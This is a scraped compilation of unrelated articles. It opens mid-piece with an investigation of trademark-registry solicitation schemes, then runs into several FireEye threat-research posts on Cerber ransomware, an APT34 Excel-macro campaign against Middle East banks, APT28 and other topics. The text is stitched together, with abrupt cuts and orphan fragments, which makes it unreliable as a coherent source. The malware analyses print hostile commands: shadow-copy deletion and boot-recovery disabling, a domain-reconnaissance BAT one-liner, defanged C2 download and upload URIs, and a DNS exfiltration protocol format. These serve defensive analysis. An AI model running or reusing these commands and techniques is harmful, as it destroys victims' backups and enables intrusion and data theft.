Recipients of the letter are asked to make checks payable to Trademark-DB Corp and mail them to 10223 W Broadway St Ste P, PMB # 336, Pearland, TX 77584. This is the location of a UPS Store, pictured by Google’s Street View on the photo below. The term “PMB” means it’s a private mailbox, which is a private company’s version of a PO Box.

After some research, I came across another trademark registration company that was associated with the same fax number as Trademark-DB, 011-423-3841889. That company was called Trademark Info Corp. Its mailing address was the same UPS Store location, but it was using private mailbox number 330 instead of 336.

The “invoices” sent by Trademark Info looked very much like the letters from Trademark-DB, as you can see in the excerpt below. This solicitation appears to have been sent in 2006. I found it in the collection of trademark scam examples published by the firm Hodgson Legal, where you can see the full letter on page 4.


Based on the “invoices” I located for Trademark-DB, it was using the Texas location in 2015-2016. I came across additional invoices (1, 2) sent by this firm in 2013 and 2014 that specified a different address: 2207 Concord Pike, PMB # 582, Wilmington, DE 19803. This is a shop called My Mailbox Store, which, among other services, rents mailboxes.

Interestingly, this private mailbox number at this location was used in 2006 by a company called Americash Hotline, LLC d/b/a Direct Cash Express, LLC, which the Attorney General of the State of West Virginia accused of being “engaged in the business of making usurious payday loans to consumers” according to the Petition to Enforce Investigative Subpoenas filed that year. However, the use of the same mailbox by Trademark-DB ten years later might be a coincidence.

Another letter sent by Trademark-DB, probably dated 2015, uses the drop address of 2100 M St. NW, Ste 170, # 330, Washington, DC 20037. This is a UPS Store location. Note the use of the same mailbox number (330) as in the Texas location. Perhaps coincidentally, another mailbox (170) in the Washington store was reported to be associated with an unrelated award-acceptance scam in 2012.

Though the addresses where trademark letter recipients were urged to send payments were in the United States, bother Trademark-DB and Trademark Info are located elsewhere.

Court of Vaduz, Principality of Liechtenstein

Trademark Info and Trademark-DB maintain separate websites, and respectively. Each site includes a Terms of Business section stating that the companies are registered in Principality of Liechtenstein, though at different addresses.

Liechtenstein is a small sovereign country nestled between Switzerland and Austria, according to Wikipedia. Its capital is Vaduz. Trademark-DB’s site states that:

“The Court of Vaduz, Principality of Liechtenstein, shall have exclusive jurisdiction over all claims or disputes arising in relation to, out of or in connection with Trademark-DB AG…”

I was able to locate Trademark-DB’s record in the Liechtenstein business registry. The mailing address of the company in Liechtenstein matches the one on Trademark-DB’s website, though the record also indicates that the correspondence should be sent care of Treufid Trust. This company’s website,, markets the firm as “your contact for start-ups and their management, accounting, tax and business consulting, auditing and secretarial services.” (I translated it from German via Google.)


I found Trademark Info’s record, too. It indicates that the company is in “in liquidation,” if I’m interpreting it correctly. This firm’s latest address is different from Trademark-DB’s address, and its point of contact is Kimar Anstalt. According to the Panama Offshore Leaks Database, it’s a subsidiary of Majoria Investments Limited, which the same database lists as being “defaulted.”

The two firms are clearly connected:

  • Both listed the same fax number on their letters, which included very similar content.
  • Both were using the same location in US as the drop point for checks. Both were registered in Liechtenstein, albeit at different addresses.
  • In addition, both specified the same phone number, 4233841077, in their domain registration records.
  • Moreover, a search of PassiveTotal records showed that the firms’ web servers employed the same DNS and registrar servers and at some point were assigned IP addresses on the same Class C subnet

I suspect Trademark Info was the first incarnation of the scheme and has now been dissolved. Trademark-DB seems like a reincarnation of the service, or perhaps it is a copycat effort. It is active as of this writing.

Unsecured Nonpriority Claims

Though Trademark Info as a company appears to have been liquidated, the database hosted on its site is still available. I found no way to browse its full contents, but one can perform searches to query the records. For instance, when I search for records where the owner of the trademark contained an “a”, the site showed me 20 records of companies with addresses in the US and Canada.

Presumably, each of these companies paid around $600 to be included in this listing, possibly because they misinterpreted the letter sent by Trademark Info as an invoice. The service for which they paid was of dubious value. As far as I can tell search engine don’t include the site’s contents in their index, so people are unlikely to come across the trademark’s entry in this database unless they specifically search the database for it.

Another indication that companies issued payments to Trademark Info comes in the form of unclaimed funds that Texas Comptroller of Public Accounts is holding for the now-defunct company. I came across these records on the Texas government’s website that lets you search for such funds. It listed two unclaimed payments for $587 and two for $1,174, dating from 2005 to 2010.

Another example of the recipients treating Trademark Info’s letters as invoices can be seen in the petition that Mineola Water Corporation filed with the US Bankruptcy Court in Alabama. The company listed Trademark Info as a creditor “holding unsecured nonpriority claims” for its Sip of the South trademark in the amount of $596. The claim seems to be dated to 2008.

The database maintained by Trademark-DB is online as well. Like the Trademark Info catalog, the contents of this database do not seem to be available in search engines’ indexes. A few queries that I ran showed me various records registered between 2005 and 2012. It’s strange that I didn’t come across the more recent entries, given that I came across “invoices” that Trademark-DB sent between 2013 and 2015. I doubt people stopped responding, so perhaps the company stopped bothering to add new entries to its database? Or maybe the dates in its database are wrong?

Non-USPTO Solicitations

The US Patent and Trademark Office maintains a page that warns about “non-USPTO solicitations that may resemble official USPTO communications.” It includes several examples of what the page calls “non-USPTO solicitations about which we have received complaints within the past several months.” It carefully avoids using the term “scam,” except when referring to the criminal indictment issued against one of the listed entities.

Though the list of non-USPTO examples includes three letters sent by Trademark-TD (1, 2, 3) for its Texas, Washington and Delaware locations, the scheme involving Trademark-TD is still active. If it is, indeed, associated with the actions of Trademark Info, these machinations have been going on for at least a decade. The longevity of the campaign isn’t surprising, given the difficulty of tracking down the companies and individuals behind them, especially when the controlling organizations are in the Principality of Liechtenstein.

Yet, the checks are being collected from US-based locations, which can be used as a starting point for further investigating the schemes that, at best, push the boundaries of US laws.  For example, Title 39, United States Code, Section 3001, reportedly “makes it illegal to mail a solicitation in the form of an invoice, bill, or statement of account due unless it conspicuously bears a notice” stating that it’s not a bill. Furthermore, I wonder whether the lack of value in being listed in a private trademark registry might violate US federal and state laws that prohibit deceptive and unfair trade practices.

If you receive misleading communications from private trademark registration entities, the USPTO encourages you to file a complaint with the Federal Trade Commission (FTC). It also says that if you receive solicitations that are not already listed on the USPTO page mentioned above, that you email Lastly, USPTO recommends that you report the incident to your state’s “consumer protection authorities,” which you can locate via this link.

Cerber: Analyzing a Ransomware Attack Methodology To Enable Protection

Ransomware is a common method of cyber extortion for financial gain that typically involves users being unable to interact with their files, applications or systems until a ransom is paid. Accessibility of cryptocurrency such as Bitcoin has directly contributed to this ransomware model. Based on data from FireEye Dynamic Threat Intelligence (DTI), ransomware activities have been rising fairly steadily since mid-2015.

On June 10, 2016, FireEye’s HX detected a Cerber ransomware campaign involving the distribution of emails with a malicious Microsoft Word document attached. If a recipient were to open the document a malicious macro would contact an attacker-controlled website to download and install the Cerber family of ransomware.

Exploit Guard, a major new feature of FireEye Endpoint Security (HX), detected the threat and alerted HX customers on infections in the field so that organizations could inhibit the deployment of Cerber ransomware. After investigating further, the FireEye research team worked with security agency CERT-Netherlands, as well as web hosting providers who unknowingly hosted the Cerber installer, and were able to shut down that instance of the Cerber command and control (C2) within hours of detecting the activity. With the attacker-controlled servers offline, macros and other malicious payloads configured to download are incapable of infecting users with ransomware.

FireEye hasn’t seen any additional infections from this attacker since shutting down the C2 server, although the attacker could configure one or more additional C2 servers and resume the campaign at any time. This particular campaign was observed on six unique endpoints from three different FireEye endpoint security customers. HX has proven effective at detecting and inhibiting the success of Cerber malware.

Attack Process

The Cerber ransomware attack cycle we observed can be broadly broken down into eight steps:

  1. Target receives and opens a Word document.
  2. Macro in document is invoked to run PowerShell in hidden mode.
  3. Control is passed to PowerShell, which connects to a malicious site to download the ransomware.
  4. On successful connection, the ransomware is written to the disk of the victim.
  5. PowerShell executes the ransomware.
  6. The malware configures multiple concurrent persistence mechanisms by creating command processor, screensaver, and runonce registry entries.
  7. The executable uses native Windows utilities such as WMIC and/or VSSAdmin to delete backups and shadow copies.
  8. Files are encrypted and messages are presented to the user requesting payment.

Rather than waiting for the payload to be downloaded or started around stage four or five of the aforementioned attack cycle, Exploit Guard provides coverage for most steps of the attack cycle – beginning in this case at the second step.

The most common way to deliver ransomware is via Word documents with embedded macros or a Microsoft Office exploit. FireEye Exploit Guard detects both of these attacks at the initial stage of the attack cycle.

PowerShell Abuse

When the victim opens the attached Word document, the malicious macro writes a small piece of VBScript into memory and executes it. This VBScript executes PowerShell to connect to an attacker-controlled server and download the ransomware (profilest.exe), as seen in Figure 1.

Figure 1. Launch sequence of Cerber – the macro is responsible for invoking PowerShell and PowerShell downloads and runs the malware

It has been increasingly common for threat actors to use malicious macros to infect users because the majority of organizations permit macros to run from Internet-sourced office documents.

In this case we observed the macrocode calling PowerShell to bypass execution policies – and run in hidden as well as encrypted mode – with the intention that PowerShell would download the ransomware and execute it without the knowledge of the victim.

Further investigation of the link and executable showed that every few seconds the malware hash changed with a more current compilation timestamp and different appended data bytes – a technique often used to evade hash-based detection.

Cerber in Action

Initial payload behavior

Upon execution, the Cerber malware will check to see where it is being launched from. Unless it is being launched from a specific location (%APPDATA%\&#60GUID&#62), it creates a copy of itself in the victim's %APPDATA% folder under a filename chosen randomly and obtained from the %WINDIR%\system32 folder.

If the malware is launched from the specific aforementioned folder and after eliminating any blacklisted filenames from an internal list, then the malware creates a renamed copy of itself to “%APPDATA%\&#60GUID&#62” using a pseudo-randomly selected name from the “system32” directory. The malware executes the malware from the new location and then cleans up after itself.

Shadow deletion

As with many other ransomware families, Cerber will bypass UAC checks, delete any volume shadow copies and disable safe boot options. Cerber accomplished this by launching the following processes using respective arguments:

Vssadmin.exe "delete shadows /all /quiet"

WMIC.exe "shadowcopy delete"

Bcdedit.exe "/set {default} recoveryenabled no"

Bcdedit.exe "/set {default} bootstatuspolicy ignoreallfailures


People may wonder why victims pay the ransom to the threat actors. In some cases it is as simple as needing to get files back, but in other instances a victim may feel coerced or even intimidated. We noticed these tactics being used in this campaign, where the victim is shown the message in Figure 2 upon being infected with Cerber.

Figure 2. A message to the victim after encryption

The ransomware authors attempt to incentivize the victim into paying quickly by providing a 50 percent discount if the ransom is paid within a certain timeframe, as seen in Figure 3.



Figure 3. Ransom offered to victim, which is discounted for five days

Multilingual Support

As seen in Figure 4, the Cerber ransomware presented its message and instructions in 12 different languages, indicating this attack was on a global scale.

Figure 4.   Interface provided to the victim to pay ransom supports 12 languages


Cerber targets 294 different file extensions for encryption, including .doc (typically Microsoft Word documents), .ppt (generally Microsoft PowerPoint slideshows), .jpg and other images. It also targets financial file formats such as. ibank (used with certain personal finance management software) and .wallet (used for Bitcoin).

Selective Targeting

Selective targeting was used in this campaign. The attackers were observed checking the country code of a host machine’s public IP address against a list of blacklisted countries in the JSON configuration, utilizing online services such as to verify the information. Blacklisted (protected) countries include: Armenia, Azerbaijan, Belarus, Georgia, Kyrgyzstan, Kazakhstan, Moldova, Russia, Turkmenistan, Tajikistan, Ukraine, and Uzbekistan.

The attack also checked a system's keyboard layout to further ensure it avoided infecting machines in the attackers geography: 1049—Russian, ¨ 1058—Ukrainian, 1059—Belarusian, 1064—Tajik, 1067—Armenian, 1068—Azeri, (Latin), 1079—Georgian, 1087—Kazakh, 1088—Kyrgyz (Cyrillic), 1090—Turkmen, 1091—Uzbek (Latin), 2072—Romanian (Moldova), 2073—Russian (Moldova), 2092—Azeri (Cyrillic), 2115—Uzbek (Cyrillic).

Selective targeting has historically been used to keep malware from infecting endpoints within the author’s geographical region, thus protecting them from the wrath of local authorities. The actor also controls their exposure using this technique. In this case, there is reason to suspect the attackers are based in Russia or the surrounding region.

Anti VM Checks

The malware searches for a series of hooked modules, specific filenames and paths, and known sandbox volume serial numbers, including: sbiedll.dll, dir_watch.dll, api_log.dll, dbghelp.dll, Frz_State, C:\popupkiller.exe, C:\stimulator.exe, C:\TOOLS\execute.exe, \sand-box\, \cwsandbox\, \sandbox\, 0CD1A40, 6CBBC508, 774E1682, 837F873E, 8B6F64BC.

Aside from the aforementioned checks and blacklisting, there is also a wait option built in where the payload will delay execution on an infected machine before it launches an encryption routine. This technique was likely implemented to further avoid detection within sandbox environments.


Once executed, Cerber deploys the following persistence techniques to make sure a system remains infected:

  • A registry key is added to launch the malware instead of the screensaver when the system becomes idle.
  • The “CommandProcessor” Autorun keyvalue is changed to point to the Cerber payload so that the malware will be launched each time the Windows terminal, “cmd.exe”, is launched.
  • A shortcut (.lnk) file is added to the startup folder. This file references the ransomware and Windows will execute the file immediately after the infected user logs in.
  • Common persistence methods such as run and runonce key are also used.
A Solid Defense

Mitigating ransomware malware has become a high priority for affected organizations because passive security technologies such as signature-based containment have proven ineffective.

Malware authors have demonstrated an ability to outpace most endpoint controls by compiling multiple variations of their malware with minor binary differences. By using alternative packers and compilers, authors are increasing the level of effort for researchers and reverse-engineers. Unfortunately, those efforts don’t scale.

Disabling support for macros in documents from the Internet and increasing user awareness are two ways to reduce the likelihood of infection. If you can, consider blocking connections to websites you haven’t explicitly whitelisted. However, these controls may not be sufficient to prevent all infections or they may not be possible based on your organization.

FireEye Endpoint Security with Exploit Guard helps to detect exploits and techniques used by ransomware attacks (and other threat activity) during execution and provides analysts with greater visibility. This helps your security team conduct more detailed investigations of broader categories of threats. This information enables your organization to quickly stop threats and adapt defenses as needed.


Ransomware has become an increasingly common and effective attack affecting enterprises, impacting productivity and preventing users from accessing files and data.

Mitigating the threat of ransomware requires strong endpoint controls, and may include technologies that allow security personnel to quickly analyze multiple systems and correlate events to identify and respond to threats.

HX with Exploit Guard uses behavioral intelligence to accelerate this process, quickly analyzing endpoints within your enterprise and alerting your team so they can conduct an investigation and scope the compromise in real-time.

Traditional defenses don’t have the granular view required to do this, nor can they connect the dots of discreet individual processes that may be steps in an attack. This takes behavioral intelligence that is able to quickly analyze a wide array of processes and alert on them so analysts and security teams can conduct a complete investigation into what has, or is, transpiring. This can only be done if those professionals have the right tools and the visibility into all endpoint activity to effectively find every aspect of a threat and deal with it, all in real-time. Also, at FireEye, we go one step ahead and contact relevant authorities to bring down these types of campaigns.

Click here for more information about Exploit Guard technology.

Targeted Attacks against Banks in the Middle East

UPDATE (Dec. 8, 2017): We now attribute this campaign to APT34, a suspected Iranian cyber espionage threat group that we believe has been active since at least 2014. Learn more about APT34 and their late 2017 targeting of a government organization in the Middle East.


In the first week of May 2016, FireEye’s DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region. The threat actors appear to be performing initial reconnaissance against would-be targets, and the attacks caught our attention since they were using unique scripts not commonly seen in crimeware campaigns.

In this blog we discuss in detail the tools, tactics, techniques and procedures (TTPs) used in these targeted attacks.

Delivery Method

The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East. The themes of the messages used in the attacks are related to IT Infrastructure such as a log of Server Status Report or a list of Cisco Iron Port Appliance details. In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks. This email was then forwarded to several people, with the malicious Excel file attached.

Macro Details

The macro first calls an Init() function (shown in Figure 1) that performs the following malicious activities:

  1. Extracts base64-encoded content from the cells within a worksheet titled "Incompatible".
  2. Checks for the presence of a file at the path %PUBLIC%\Libraries\ update.vbs. If the file is not present, the macro creates three different directories under %PUBLIC%\Libraries, namely up, dn, and tp.
  3. The extracted content from step one is decoded using PowerShell and dropped into two different files: %PUBLIC%\Libraries\update.vbs and %PUBLIC%\Libraries\dns.ps1
  4. The macro then creates a scheduled task with name: GoogleUpdateTaskMachineUI, which executes update.vbs every three minutes.

Note: Due to the use of a hardcoded environment variable %PUBLIC% in the macro code, the macro will only run successfully on Windows Vista and subsequent versions of the operating system.

Figure 1: Macro Init() subroutine

Run-time Unhiding of Content

One of the interesting techniques we observed in this attack was the display of additional content after the macro executed successfully. This was done for the purpose of social engineering – specifically, to convince the victim that enabling the macro did in fact result in the “unhiding” of additional spreadsheet data.

Office documents containing malicious macros are commonly used in crimeware campaigns. Because default Office settings typically require user action in order for macros to run, attackers may convince victims to enable risky macro code by telling them that the macro is required to view “protected content.”

In crimeware campaigns, we usually observe that no additional content is displayed after enabling the macros. However, in this case, attackers took the extra step to actually hide and unhide worksheets when the macro is enabled to allay any suspicion. A screenshot of the worksheet before and after running the macro is shown in Figure 2 and Figure 3, respectively.

Figure 2: Before unhiding of content

Figure 3: After unhiding of content

In the following code section, we can see that the subroutine ShowHideSheets() is called after the Init() subroutine executes completely:

Private Sub Workbook_Open()
    Call Init

        Call ShowHideSheets
End Sub

The code of subroutine ShowHideSheets(), which unhides the content after completion of malicious activities, is shown in Figure 4.

Figure 4: Macro used to unhide content at runtime

First Stage Download

After the macro successfully creates the scheduled task, the dropped VBScript, update.vbs (Figure 5), will be launched every three minutes. This VBScript performs the following operations:

  1. Leverages PowerShell to download content from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\dwn&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  2. Uses PowerShell to download a BAT file from the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\bat&m=d and saves it in the directory %PUBLIC%\Libraries\dn.
  3. Executes the BAT file and stores the results in a file in the path %PUBLIC%\Libraries\up.
  4. Uploads this file to the server by sending an HTTP POST request to the URI hxxp://go0gIe[.]com/sysupdate.aspx?req=xxx\upl&m=u.
  5. Finally, it executes the PowerShell script dns.ps1, which is used for the purpose of data exfiltration using DNS.

Figure 5: Content of update.vbs

During our analysis, the VBScript downloaded a customized version of Mimikatz in the previously mentioned step one. The customized version uses its own default prompt string as well as its own console title, as shown in Figure 6.

Figure 6: Custom version of Mimikatz used to extract user password hashes

Similarly, the contents of the BAT file downloaded in step two are shown in Figure 7:

whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1

Figure 7: Content of downloaded BAT script

This BAT file is used to collect important information from the system, including the currently logged on user, the hostname, network configuration data, user and group accounts, local and domain administrator accounts, running processes, and other data.

Data Exfiltration over DNS

Another interesting technique leveraged by this malware was the use of DNS queries as a data exfiltration channel. This was likely done because DNS is required for normal network operations. The DNS protocol is unlikely to be blocked (allowing free communications out of the network) and its use is unlikely to raise suspicion among network defenders.

The script dns.ps1, dropped by the macro, is used for this purpose. In the following section, we describe its functionality in detail.

  1. The script requests an ID (through the DNS protocol) from go0gIe[.]com. This ID will then be saved into the PowerShell script.
  2. Next, the script queries the C2 server for additional instructions. If no further actions are requested, the script exits and will be activated again the next time update.vbs is called.
  3. If an action is required, the DNS server replies with an IP with the pattern 33.33.xx.yy. The script then proceeds to create a file at %PUBLIC%\Libraries\tp\chr(xx)chr(yy).bat. The script then proceeds to make DNS requests to fetch more data. Each DNS request results in the C2 server returning an IP address. Each octet of the IP address is interpreted as the decimal representation of an ASCII character; for example, the decimal number 99 is equivalent to the ASCII character ‘c’. The characters represented by the octets of the IP address are appended to the batch file to construct a script. The C2 server signals the end of the data stream by replying to a DNS query with the IP address
  4. Once the file has been successfully transferred, the BAT file will be run and its output saved as %PUBLIC%\Libraries\tp\chr(xx)chr(yy).txt.
  5. The text file containing the results of the BAT script will then be uploaded to the DNS server by embedding file data into part of the subdomain. The format of the DNS query used is shown in Table 1.
  6. The BAT file and the text file will then be deleted. The script then quits, to be invoked again upon running the next scheduled task.

The DNS communication portion of the script is shown in Figure 8, along with a table showing the various subdomain formats being generated by the script.

Figure 8: Code Snippet of dns.ps1

Format of subdomains used in DNS C2 protocol:

Subdomain used to request for BotID, used in step 2 above

[00][botid]00000[base36 random number]30

Subdomain used while performing file transfers used in step 3 above

[00][botid]00000[base36 random number]232A[hex_filename][i-counter]

Subdomain used while performing file upload, used in step 5 above

[00][botid][cmdid][partid][base36 random number][48-hex-char-of-file-content]

Table 1: C2 Protocol Format


Although this attack did not leverage any zero-days or other advanced techniques, it was interesting to see how attackers used different components to perform reconnaissance activities on a specific target.

This attack also demonstrates that macro malware is effective even today. Users can protect themselves from such attacks by disabling Office macros in their settings and also by being more vigilant when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

The Consistency of Plastique

As I said in my last post I have been travelling quite extensively recently, but this weekend I was able to take a long weekend in Oslo with my wife just before the Nordic CSA Summit where I was invited to speak on “the CISO Perspective”. As a gift for speaking, each of us was … Read More

APT28: A Window into Russia’s Cyber Espionage Operations?

The role of nation-state actors in cyber attacks was perhaps most widely revealed in February 2013 when Mandiant released the APT1 report, which detailed a professional cyber espionage group based in China. Today we release a new report: APT28: A Window Into Russia’s Cyber Espionage Operations?

This report focuses on a threat group that we have designated as APT28. While APT28’s malware is fairly well known in the cybersecurity community, our report details additional information exposing ongoing, focused operations that we believe indicate a government sponsor based in Moscow.

In contrast with the China-based threat actors that FireEye tracks, APT28 does not appear to conduct widespread intellectual property theft for economic gain. Instead, APT28 focuses on collecting intelligence that would be most useful to a government. Specifically, FireEye found that since at least 2007, APT28 has been targeting privileged information related to governments, militaries and security organizations that would likely benefit the Russian government.

In our report, we also describe several malware samples containing details that indicate that the developers are Russian language speakers operating during business hours that are consistent with the time zone of Russia’s major cities, including Moscow and St. Petersburg. FireEye analysts also found that APT28 has systematically evolved its malware since 2007, using flexible and lasting platforms indicative of plans for long-term use and sophisticated coding practices that suggest an interest in complicating reverse engineering efforts.

We assess that APT28 is most likely sponsored by the Russian government based on numerous factors summarized below:

Table for APT28

FireEye is also releasing indicators to help organizations detect APT28 activity. Those indicators can be downloaded at

As with the APT1 report, we recognize that no single entity completely understands the entire complex picture of intense cyber espionage over many years. Our goal by releasing this report is to offer an assessment that informs and educates the community about attacks originating from Russia. The complete report can be downloaded here: /content/dam/legacy/resources/pdfs/apt28.pdf.

A Threatening Threat Map

FireEye recently released a ThreatMap to visualize some of our Threat Intelligence Data.

The ThreatMap data is a sample of real data collected from our two-way sharing customers for the past 30 days. The data represented in the map is malware communication to command and control (C2) servers, where the "Attackers” represent the location of the C2 servers and "Targets" represent customers.

To mask customer identity, locations are represented as the center of the country in which they reside. There is nothing in the data that can be used to identify a customer or their origin city. The "attacks today" counter is not a real time. Rather, we take a real, observed attack rate and then calculate attacks for the day based on local time.

One of the biggest challenges with the ThreatMap was how to display this information in a consumable way. If all attacks were shown at the rate they occur, the map would be incomprehensible and full of lines. To solve this, we decided to randomly select which lines to display from our dataset at a rate that results in the best viewing experience. The random selection will help to allow a user to see which areas are targeted more and see which APT families target specific regions.

So how does FireEye use this information? We use it to understand patterns and further our threat intelligence. It lets us see trends over time as well as by malware family or threat actor.

For instance, it lets us examine whether a particular threat actor – say APT1 – is using a particular set of IP addresses, domain names, URLs to launch their attacks. Based on the type of malware being used it also lets us attribute the malware and hence, the source of these attacks, to particular threat actors. It allows us to combine the strategic threat intelligence we have gained from 10+ years of responding to the largest breaches with the tactical indicators of compromise we see in the millions every day from our virtual machine based sensors deployed across the globe. Connecting these dots allows us to create the eye-catching graphic but, more importantly, it also lets us take the fight to the attacker by understanding and uncovering their tactics, techniques and procedures which ultimately lets us serve our mission of better protecting our customers.

Double-edged Sword: Australia Economic Partnerships Under Attack from China

During a visit in mid-September, China’s Foreign Minister Wang Yi urged Australia to become “a bridge between east and west.” He was Down Under to discuss progress on the free trade agreement between Australia and China that seems likely by the end of the year. His comment referred to furthering the trade relationship between the two countries, but he might as well have been referring to hackers who hope to use the deepening alliance to steal information.

The Australian Financial Review (AFR) did an in-depth article with FireEye regarding Chinese attacks against Australian businesses, and this blog provides additional context.

Australia has experienced unprecedented trade growth with China over the last decade, which has created a double-edged sword. As Australian businesses partner with Chinese firms, Chinese-based threat actors increasingly launch sophisticated and targeted network attacks to obtain confidential information from Australian businesses. In the U.S. and Europe, Chinese attacks on government and private industry have become a routine in local newspapers.  Australia, it seems, is the next target.

 The Numbers

First, let’s review the state of Australian and Chinese economic interdependence.  Averaging an annual 9.10% GDP growth rate over the last two decades, China’s unparalleled economic expansion has protected Australia from the worst of the global financial crisis effects. Exports to China have increased tenfold, from $8.3b USD in 2001 to $90b USD in 2013[i], with the most prominent commodities being iron ore and natural gas. Much of these resources originate in Australia, which puts China’s government under significant pressure to meet the skyrocketing demand for them. Despite the ever-increasing co-dependence Australia and China share as regional partners, Chinese authorities are likely supporting greater levels of monitoring and intelligence gathering from the Australian economy - often conducted through Chinese State-Owned Enterprises (SOEs) with domestic relationships in Australia.

SOE direct investment into Australia grew to 84% of all foreign investment inflows from China in 2014, primarily directed into the Australian mining and resource sector; demonstrating a further signal for control as China seeks to capture a level of certainty in catering for its future internal growth. We suspect this to be government-commissioned cyber threat actors targeting Australian firms with a specific agenda: to gain advantage and control of assets both in physical infrastructure and intellectual property.


Figure 1. Chinese Direct Investment into Australia by industry

The Impacts

How have these partnerships impacted Australian networks?  Mandiant has observed the strategic operations of Chinese threat actors target companies involved in key economic sectors, including data theft from an Australian firm.  Chinese Advanced Persistent Threats (APTs) are likely interested in compromising Australian mining and natural resources firms, especially after spikes in commodity prices. The upward trend in APT attacks from China is also aimed toward the third parties in the mining and natural resources ecosystems. Mandiant believes a significant increase in China-based APT intrusions focused on law firms that hold confidential mergers and acquisitions information and sensitive intellectual property. It is no coincidence these third-party firms are often found lacking in network protections. The investigation also found that, at the time of compromise, the majority of victim firms were in direct negotiations with Chinese enterprises, highlighting attempts by the Chinese government to gain advantage in targeted areas.

Due to its endemic pollution problems, clean energy has evolved into a critical industry for China. The country has now engaged a plan to develop Strategic Emerging Industries (SEIs) to address this. Australian intellectual property and R&D have become prime data, and has taken a major position in Chinese APT campaigns. Again, it is the third parties like law firms that are coming under attack.

Furthermore, to reduce China’s reliance on Australian iron ore exports, Beijing has initiated a plan to develop an efficient, high-end steel production vertical through strategic acquisitions in Australia and intervening to prevent unfavorable alliances.  For example, the SOE Chinalco bought into Australian mining companies to presumably prevent a merger that would have disadvantaged their interests. Clearly, the confidential business information of Australian export partners to China is becoming increasingly sought after.

Mandiant found that the majority of compromised firms had either current negotiation with Chinese enterprises or previous business engagements with Chinese enterprises. These attacks will persist as trade and investment grows, though they will do so at the cost of confidential Australian business information such as R&D and intellectual property. As large Australian mining and resources firms themselves may partner with the Australian Signals Directorate for security, the focus of the threat actors shifts to associated parties with access to sensitive data, who may not be pursuing partnerships with the Australian Signals Directorate.  This calls for greater awareness and protection against the increasingly determined and advanced attacks launched.

The Bottom Line

Although this blog focuses on acts against large Australian mining and resources sectors, Mandiant has observed these APT actors often focusing their attention on other sectors such as defence, telecommunications, agriculture, political organizations, high technology, transportation, and aerospace, among others. But the broader lesson and message—drawing from U.S. and European experience with Chinese attacks—is that no one is or will be exempt.  For all Australian businesses and governments, it’s time to fortify defences for a new era of cyber security.


[i]"Australian Government Department of Foreign Trade and Affairs.


FLARE IDA Pro Script Series: MSDN Annotations IDA Pro for Malware Analysis

The FireEye Labs Advanced Reverse Engineering (FLARE) Team continues to share knowledge and tools with the community. We started this blog series with a script for Automatic Recovery of Constructed Strings in Malware. As always, you can download these scripts at the following location: We hope you find all these scripts as useful as we do.




During my summer internship with the FLARE team, my goal was to develop IDAPython plug-ins that speed up the reverse engineering workflow in IDA Pro. While analyzing malware samples with the team, I realized that a lot of time is spent looking up information about functions, arguments, and constants at the Microsoft Developer Network (MSDN) website. Frequently switching to the developer documentation can interrupt the reverse engineering process, so we thought about ways to integrate MSDN information into IDA Pro automatically. In this blog post we will release a script that does just that, and we will show you how to use it.




The MSDN Annotations plug-in integrates information about functions, arguments and return values into IDA Pro’s disassembly listing in the form of IDA comments. This allows the information to be integrated as seamlessly as possible. Additionally, the plug-in is able to automatically rename constants, which further speeds up the analyst workflow. The plug-in relies on an offline XML database file, which is generated from Microsoft’s documentation and IDA type library files.




Table 1 shows what benefit the plug-in provides to an analyst. On the left you can see IDA Pro’s standard disassembly: seven arguments get pushed onto the stack and then the CreateFileA function is called. Normally an analyst would have to look up function, argument and possibly constant descriptions in the documentation to understand what this code snippet is trying to accomplish. To obtain readable constant values, an analyst would be required to research the respective argument, import the corresponding standard enumeration into IDA and then manually rename each value. The right side of Table 1 shows the result of executing our plug-in showing the support it offers to an analyst.

The most obvious change is that constants are renamed automatically. In this example, 40000000h was automatically converted to GENERIC_WRITE. Additionally, each function argument is renamed to a unique name, so the corresponding description can be added to the disassembly.


Table 1: Automatic labelling of standard symbolic constants

In Figure 1 you can see how the plug-in enables you to display function, argument, and constant information right within the disassembly. The top image shows how hovering over the CreateFileA function displays a short description and the return value. In the middle image, hovering over the hTemplateFile argument displays the corresponding description. And in the bottom image, you can see how hovering over dwShareMode, the automatically renamed constant displays descriptive information.







Figure 1: Hovering function names, arguments and constants displays the respective descriptions


How it works


Before the plug-in makes any changes to the disassembly, it creates a backup of the current IDA database file (IDB). This file gets stored in the same directory as the current database and can be used to revert to the previous markup in case you do not like the changes or something goes wrong.

The plug-in is designed to run once on a sample before you start your analysis. It relies on an offline database generated from the MSDN documentation and IDA Pro type library (TIL) files. For every function reference in the import table, the plug-in annotates the function’s description and return value, adds argument descriptions, and renames constants. An example of an annotated import table is depicted in Figure 2. It shows how a descriptive comment is added to each API function call. In order to identify addresses of instructions that position arguments prior to a function call, the plug-in relies on IDA Pro’s markup.


Figure 2: Annotated import table

Figure 3 shows the additional .msdn segment the plug-in creates in order to store argument descriptions. This only impacts the IDA database file and does not modify the original binary.


Figure 3: The additional segment added to the IDA database

The .msdn segment stores the argument descriptions as shown in Figure 4. The unique argument names and their descriptive comments are sequentially added to the segment.


Figure 4: Names and comments inserted for argument descriptions

To allow the user to see constant descriptions by hovering over constants in the disassembly, the plug-in imports IDA Pro’s relevant standard enumeration and adds descriptive comments to the enumeration members. Figure 5 shows this for the MACRO_CREATE enumeration, which stores constants passed as dwCreationDisposition to CreateFileA.


Figure 5: Descriptions added to the constant enumeration members


Preparing the MSDN database file


The plug-in’s graphical interface requires you to have the QT framework and Python scripting installed. This is included with the IDA Pro 6.6 release. You can also set it up for IDA 6.5 as described here (

As mentioned earlier, the plug-in requires an XML database file storing the MSDN documentation. We cannot distribute the database file with the plug-in because Microsoft holds the copyright for it. However, we provide a script to generate the database file. It can be cloned from the git repository at together with the annotation plug-in.

